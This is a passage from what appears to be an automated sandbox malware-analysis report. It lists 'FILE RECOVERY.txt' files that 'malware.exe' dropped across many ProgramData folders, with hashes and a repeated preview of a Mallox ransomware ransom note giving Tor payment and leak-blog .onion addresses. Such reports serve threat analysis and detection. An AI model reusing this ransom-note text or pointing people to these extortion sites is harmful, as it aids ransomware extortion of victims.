                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Crypto\DSS\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Crypto\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Crypto\Keys\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Crypto\PCPKSP\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Crypto\PCPKSP\WindowsAIK\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Crypto\RSA\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Crypto\SystemKeys\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\DRM\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\DRM\Server\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Device Stage\Device\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Device Stage\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Device Stage\Task\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-GB\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
